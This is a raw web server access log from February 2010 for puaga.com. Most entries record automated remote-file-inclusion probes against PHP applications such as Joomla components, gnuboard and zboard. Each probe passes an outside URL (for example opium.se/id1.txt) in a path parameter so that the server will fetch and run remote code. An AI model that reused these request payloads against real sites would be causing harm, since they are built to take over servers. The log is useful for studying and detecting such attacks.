67.15.24.16 - - [18/Feb/2010:09:34:05 -0800] "GET /components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://opium.se/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.15.24.16 - - [18/Feb/2010:09:34:15 -0800] "GET /logs/access.log%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://opium.se/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.120 - - [18/Feb/2010:09:34:22 -0800] "GET /logs/access_100123.log//include/admin.lib.inc.php?site_path=http://www.provedorm4net.com.br/portal/.laknat/laknat???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
208.51.143.9 - - [18/Feb/2010:09:35:07 -0800] "GET /config/dbutil.bck.php?confdir=http://www.gzzsyy.com.cn/brd/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.51.143.9 - - [18/Feb/2010:09:35:07 -0800] "GET /logs//config/dbutil.bck.php?confdir=http://www.gzzsyy.com.cn/brd/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.51.143.9 - - [18/Feb/2010:09:35:07 -0800] "GET /logs/access_100125.log//config/dbutil.bck.php?confdir=http://www.gzzsyy.com.cn/brd/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
38.101.148.126 - - [18/Feb/2010:09:35:11 -0800] "GET /robots.txt HTTP/1.1" 200 36 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "puaga.com"
38.101.148.126 - - [18/Feb/2010:09:35:12 -0800] "GET /ideal/forum/viewtopic.php?p=30346 HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "puaga.com"
67.15.24.16 - - [18/Feb/2010:09:35:14 -0800] "GET /components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://opium.se/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.15.24.16 - - [18/Feb/2010:09:35:23 -0800] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://opium.se/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.15.24.16 - - [18/Feb/2010:09:35:23 -0800] "GET /logs/access.log//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://opium.se/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.51.143.9 - - [18/Feb/2010:09:35:23 -0800] "GET /logs/access_100130.log//config/dbutil.bck.php?confdir=http://www.gzzsyy.com.cn/brd/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.15.24.16 - - [18/Feb/2010:09:35:28 -0800] "GET /logs/access_100120.log//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://opium.se/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.15.24.16 - - [18/Feb/2010:09:36:09 -0800] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://opium.se/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.15.24.16 - - [18/Feb/2010:09:36:09 -0800] "GET /components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://opium.se/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.15.24.16 - - [18/Feb/2010:09:36:09 -0800] "GET /logs/access_100120.log//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://opium.se/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.195.111.172 - - [18/Feb/2010:09:36:43 -0800] "GET /logs/?S=D HTTP/1.0" 200 4926 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
208.51.143.9 - - [18/Feb/2010:09:36:45 -0800] "GET /logs/access_100104.log//config/dbutil.bck.php?confdir=http://www.gzzsyy.com.cn/brd/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.195.111.172 - - [18/Feb/2010:09:38:02 -0800] "GET /logs/access_100218.log HTTP/1.0" 200 1464129 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
74.50.85.229 - - [18/Feb/2010:09:38:08 -0800] "GET /logs/access_100117.log%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.radek-mx.pl//news/data/id1.txt????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.252.1.109 - - [18/Feb/2010:09:39:41 -0800] "GET /logs/access_100112.log%20%20/?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.kortech.cn/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.252.1.109 - - [18/Feb/2010:09:39:41 -0800] "GET /logs/?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.kortech.cn/bbs/id1.txt? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.puaga.com"
122.252.1.109 - - [18/Feb/2010:09:39:42 -0800] "GET /?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.kortech.cn/bbs/id1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
210.127.209.105 - - [18/Feb/2010:09:39:55 -0800] "GET /logs/bbs/write_update.php?board_skin_path=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.puaga.com"
210.127.209.105 - - [18/Feb/2010:09:39:55 -0800] "GET /logs/access.log/bbs/write_update.php?board_skin_path=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.puaga.com"
213.186.58.214 - - [18/Feb/2010:09:41:02 -0800] "GET /logs/access_100202.log%20%20/send_reminders.php?includedir=http://alienweb-irc.net/gossid?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.186.58.214 - - [18/Feb/2010:09:41:02 -0800] "GET /send_reminders.php?includedir=http://alienweb-irc.net/gossid?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.186.58.214 - - [18/Feb/2010:09:41:02 -0800] "GET /logs/send_reminders.php?includedir=http://alienweb-irc.net/gossid?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.252.1.109 - - [18/Feb/2010:09:41:05 -0800] "GET /logs/?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.kortech.cn/bbs/id1.txt? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.puaga.com"
122.252.1.109 - - [18/Feb/2010:09:41:05 -0800] "GET /logs/access_100212.log/?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.kortech.cn/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.252.1.109 - - [18/Feb/2010:09:41:05 -0800] "GET /?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.kortech.cn/bbs/id1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
122.252.1.109 - - [18/Feb/2010:09:41:09 -0800] "GET /logs/access_100212.log/?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.kortech.cn/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.252.1.109 - - [18/Feb/2010:09:41:09 -0800] "GET /logs/?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.kortech.cn/bbs/id1.txt? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.puaga.com"
122.252.1.109 - - [18/Feb/2010:09:41:09 -0800] "GET /?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.kortech.cn/bbs/id1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
210.127.209.105 - - [18/Feb/2010:09:41:14 -0800] "GET /logs/access_100128.log/bbs/write_update.php?board_skin_path=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.puaga.com"
91.121.77.220 - - [18/Feb/2010:09:41:16 -0800] "GET /logs/send_reminders.php?includedir=http://alienweb-irc.net/gossid?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.77.220 - - [18/Feb/2010:09:41:16 -0800] "GET /logs/access_100202.log%20%20/send_reminders.php?includedir=http://alienweb-irc.net/gossid?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.77.220 - - [18/Feb/2010:09:41:16 -0800] "GET /send_reminders.php?includedir=http://alienweb-irc.net/gossid?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.77.220 - - [18/Feb/2010:09:41:21 -0800] "GET /send_reminders.php?includedir=http://alienweb-irc.net/gossid?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.77.220 - - [18/Feb/2010:09:41:21 -0800] "GET /logs/access_100202.log%20%20/send_reminders.php?includedir=http://alienweb-irc.net/gossid?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.77.220 - - [18/Feb/2010:09:41:21 -0800] "GET /logs/send_reminders.php?includedir=http://alienweb-irc.net/gossid?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.186.58.214 - - [18/Feb/2010:09:41:59 -0800] "GET /logs/access_100125.log%20%20/send_reminders.php?includedir=http://alienweb-irc.net/gossid?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.153 - - [18/Feb/2010:09:42:15 -0800] "GET /logs/access_100111.log%20%20//zboard/skin/sjini_flash_gray//write.php?dir=http://www.sinhan.net/zeroboard41/data/board/1212008689/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.153 - - [18/Feb/2010:09:42:15 -0800] "GET /zboard/skin/sjini_flash_gray//write.php?dir=http://www.sinhan.net/zeroboard41/data/board/1212008689/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.153 - - [18/Feb/2010:09:42:15 -0800] "GET /logs//zboard/skin/sjini_flash_gray//write.php?dir=http://www.sinhan.net/zeroboard41/data/board/1212008689/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.252.1.109 - - [18/Feb/2010:09:42:52 -0800] "GET /logs/access_100209.log/?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.kortech.cn/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.252.1.109 - - [18/Feb/2010:09:42:54 -0800] "GET /logs/access_100209.log/?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.kortech.cn/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [18/Feb/2010:09:43:32 -0800] "GET /logs/lostpasswd.php?env[include_prefix]=http://hajarmani.fileave.com/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [18/Feb/2010:09:43:32 -0800] "GET /logs/access_100116.log%20%20/lostpasswd.php?env[include_prefix]=http://hajarmani.fileave.com/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [18/Feb/2010:09:43:32 -0800] "GET /lostpasswd.php?env[include_prefix]=http://hajarmani.fileave.com/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.141.1.113 - - [18/Feb/2010:09:43:46 -0800] "GET /logs/access.log%20%20//bbs/delete_comment.php?board_skin_path=http://partner.waawaa.com//renewal/images/mywaa/mywaa_menu5.gif??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.141.1.113 - - [18/Feb/2010:09:43:46 -0800] "GET /logs//bbs/delete_comment.php?board_skin_path=http://partner.waawaa.com//renewal/images/mywaa/mywaa_menu5.gif??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.141.1.113 - - [18/Feb/2010:09:43:46 -0800] "GET /bbs/delete_comment.php?board_skin_path=http://partner.waawaa.com//renewal/images/mywaa/mywaa_menu5.gif??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.145.178 - - [18/Feb/2010:09:44:08 -0800] "GET /write.php?dir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.145.178 - - [18/Feb/2010:09:44:08 -0800] "GET /logs//write.php?dir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.145.178 - - [18/Feb/2010:09:44:08 -0800] "GET /logs/access_100203.log%20%20//write.php?dir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [18/Feb/2010:09:44:26 -0800] "GET /logs/access_100105.log%20%20/lostpasswd.php?env[include_prefix]=http://hajarmani.fileave.com/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.127.209.105 - - [18/Feb/2010:09:45:15 -0800] "GET /logs/access_100119.log/bbs/write_update.php?board_skin_path=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.puaga.com"
91.121.77.220 - - [18/Feb/2010:09:45:51 -0800] "GET /logs/access_100202.log/send_reminders.php?includedir=http://alienweb-irc.net/gossid?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.15.24.16 - - [18/Feb/2010:09:46:44 -0800] "GET /logs/access_100119.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://opium.se/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.15.24.16 - - [18/Feb/2010:09:46:44 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://opium.se/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.15.24.16 - - [18/Feb/2010:09:46:44 -0800] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://opium.se/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.77.220 - - [18/Feb/2010:09:46:45 -0800] "GET /logs/access_100125.log/send_reminders.php?includedir=http://alienweb-irc.net/gossid?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.15.24.16 - - [18/Feb/2010:09:46:48 -0800] "GET /logs/access_100126.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://opium.se/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.77.220 - - [18/Feb/2010:09:47:21 -0800] "GET /logs/access_100202.log/send_reminders.php?includedir=http://alienweb-irc.net/gossid?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [18/Feb/2010:09:47:22 -0800] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://www.nsi.or.kr/ws/files/summary/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [18/Feb/2010:09:47:22 -0800] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.nsi.or.kr/ws/files/summary/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [18/Feb/2010:09:47:23 -0800] "GET /logs/access_100205.log%20%20//admin/spaw/spaw_control.class.php?spaw_root=http://www.nsi.or.kr/ws/files/summary/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.77.220 - - [18/Feb/2010:09:47:56 -0800] "GET /logs/access_100125.log/send_reminders.php?includedir=http://alienweb-irc.net/gossid?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [18/Feb/2010:09:47:57 -0800] "GET /logs/access_100118.log%20%20//admin/spaw/spaw_control.class.php?spaw_root=http://www.nsi.or.kr/ws/files/summary/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
189.173.136.37 - - [18/Feb/2010:09:48:03 -0800] "GET / HTTP/1.1" 200 2392 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)" "www.pixero.net"
189.173.136.37 - - [18/Feb/2010:09:48:04 -0800] "GET /pnetsite/i/main.png HTTP/1.1" 200 8564 "http://www.pixero.net/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)" "www.pixero.net"
189.173.136.37 - - [18/Feb/2010:09:48:04 -0800] "GET /pnetsite/i/background.gif HTTP/1.1" 200 206161 "http://www.pixero.net/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)" "www.pixero.net"
189.173.136.37 - - [18/Feb/2010:09:48:12 -0800] "GET /pnetsite/fav.ico HTTP/1.1" 200 1406 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)" "www.pixero.net"
210.127.209.105 - - [18/Feb/2010:09:48:56 -0800] "GET /logs/access_100129.log/gnuboard4/bbs/delete.php?board_skin_path=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.puaga.com"
210.127.209.105 - - [18/Feb/2010:09:49:01 -0800] "GET /gnuboard4/bbs/delete.php?board_skin_path=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.puaga.com"
210.127.209.105 - - [18/Feb/2010:09:49:01 -0800] "GET /logs/access_100202.log/gnuboard4/bbs/delete.php?board_skin_path=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.puaga.com"
210.127.209.105 - - [18/Feb/2010:09:49:02 -0800] "GET /logs/gnuboard4/bbs/delete.php?board_skin_path=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.puaga.com"
67.15.24.16 - - [18/Feb/2010:09:49:15 -0800] "GET /logs/access_100119.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://opium.se/id1.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.15.24.16 - - [18/Feb/2010:09:49:15 -0800] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://opium.se/id1.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.15.24.16 - - [18/Feb/2010:09:49:15 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://opium.se/id1.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.199.140.158 - - [18/Feb/2010:09:49:22 -0800] "GET /include/admin.lib.inc.php?site_path=http://cs.kku.ac.kr/data/member/as/1??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.199.140.158 - - [18/Feb/2010:09:49:23 -0800] "GET /logs//include/admin.lib.inc.php?site_path=http://cs.kku.ac.kr/data/member/as/1??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.199.140.158 - - [18/Feb/2010:09:49:26 -0800] "GET /logs/access_100204.log%20%20//include/admin.lib.inc.php?site_path=http://cs.kku.ac.kr/data/member/as/1??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.15.24.16 - - [18/Feb/2010:09:49:27 -0800] "GET /logs/access_100128.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://opium.se/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.15.24.16 - - [18/Feb/2010:09:49:34 -0800] "GET /logs/access_100126.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://opium.se/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.141.1.113 - - [18/Feb/2010:09:49:41 -0800] "GET /logs/access_100124.log%20%20//bbs/delete_comment.php?board_skin_path=http://partner.waawaa.com//renewal/images/mywaa/mywaa_menu5.gif??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [18/Feb/2010:09:51:24 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.kpa.sc.kr////upload_data/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [18/Feb/2010:09:51:24 -0800] "GET /logs/access_100124.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.kpa.sc.kr////upload_data/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [18/Feb/2010:09:51:24 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.kpa.sc.kr////upload_data/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.199.140.158 - - [18/Feb/2010:09:51:33 -0800] "GET /logs/access_100117.log%20%20//include/admin.lib.inc.php?site_path=http://cs.kku.ac.kr/data/member/as/1??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [18/Feb/2010:09:51:40 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.kpa.sc.kr////upload_data/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [18/Feb/2010:09:51:40 -0800] "GET /logs/access_100124.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.kpa.sc.kr////upload_data/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [18/Feb/2010:09:51:40 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.kpa.sc.kr////upload_data/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.153 - - [18/Feb/2010:09:51:43 -0800] "GET /logs/access_100126.log%20%20//zboard/skin/sjini_flash_gray//write.php?dir=http://www.sinhan.net/zeroboard41/data/board/1212008689/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [18/Feb/2010:09:51:53 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.kpa.sc.kr////upload_data/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [18/Feb/2010:09:51:53 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.kpa.sc.kr////upload_data/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [18/Feb/2010:09:51:53 -0800] "GET /logs/access_100124.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.kpa.sc.kr////upload_data/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [18/Feb/2010:09:52:25 -0800] "GET /logs/access_100127.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.kpa.sc.kr////upload_data/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [18/Feb/2010:09:52:32 -0800] "GET /logs/access_100127.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.kpa.sc.kr////upload_data/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [18/Feb/2010:09:53:01 -0800] "GET /logs/access_100127.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.kpa.sc.kr////upload_data/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [18/Feb/2010:09:53:17 -0800] "GET /logs/access_100204.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.radek-mx.pl//news/data/id1.txt????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [18/Feb/2010:09:53:17 -0800] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.radek-mx.pl//news/data/id1.txt????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [18/Feb/2010:09:53:17 -0800] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.radek-mx.pl//news/data/id1.txt????? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
213.186.58.214 - - [18/Feb/2010:09:53:34 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://alienweb-irc.net/gossid?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.186.58.214 - - [18/Feb/2010:09:53:34 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://alienweb-irc.net/gossid?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.186.58.214 - - [18/Feb/2010:09:53:34 -0800] "GET /logs/access_100105.log%20%20/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://alienweb-irc.net/gossid?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.186.58.214 - - [18/Feb/2010:09:53:43 -0800] "GET /logs/access_100107.log%20%20/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://alienweb-irc.net/gossid?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [18/Feb/2010:09:53:47 -0800] "GET /logs/access_100123.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.radek-mx.pl//news/data/id1.txt????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [18/Feb/2010:09:54:05 -0800] "GET /logs/access_100205.log%20%20//admin/spaw/spaw_control.class.php?spaw_root=http://www.nsi.or.kr/ws/files/summary/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [18/Feb/2010:09:54:05 -0800] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://www.nsi.or.kr/ws/files/summary/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [18/Feb/2010:09:54:05 -0800] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.nsi.or.kr/ws/files/summary/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
